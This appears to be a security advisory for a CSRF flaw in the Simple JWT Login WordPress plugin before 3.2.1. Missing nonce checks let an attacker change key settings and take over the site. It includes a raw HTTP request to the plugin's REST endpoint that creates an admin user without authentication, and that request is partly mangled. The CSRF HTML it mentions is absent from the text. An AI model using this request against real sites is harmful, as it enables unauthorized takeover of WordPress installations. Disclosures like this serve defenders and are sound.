Simple JWT Login < 3.2.1 - Arbitrary Settings Update to Site Takeover via CSRF

The plugin does not have nonce checks when saving its settings, allowing attackers to make a logged in admin changed them. Settings such as HMAC verification secret, account registering and default user roles can be updated, which could result in site takeover.

PoC

The following HTML code can be used to trick an admin into changing the settings. After the exploitation, the attacker can use the REST API to create a new user with elevated privileges. Then the below request made by an unauthenticated user will create an admin user POST /?rest_route=/simple-jwt-login/v1/users HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 46 Connection: close [email protected]&password;=Passw0rd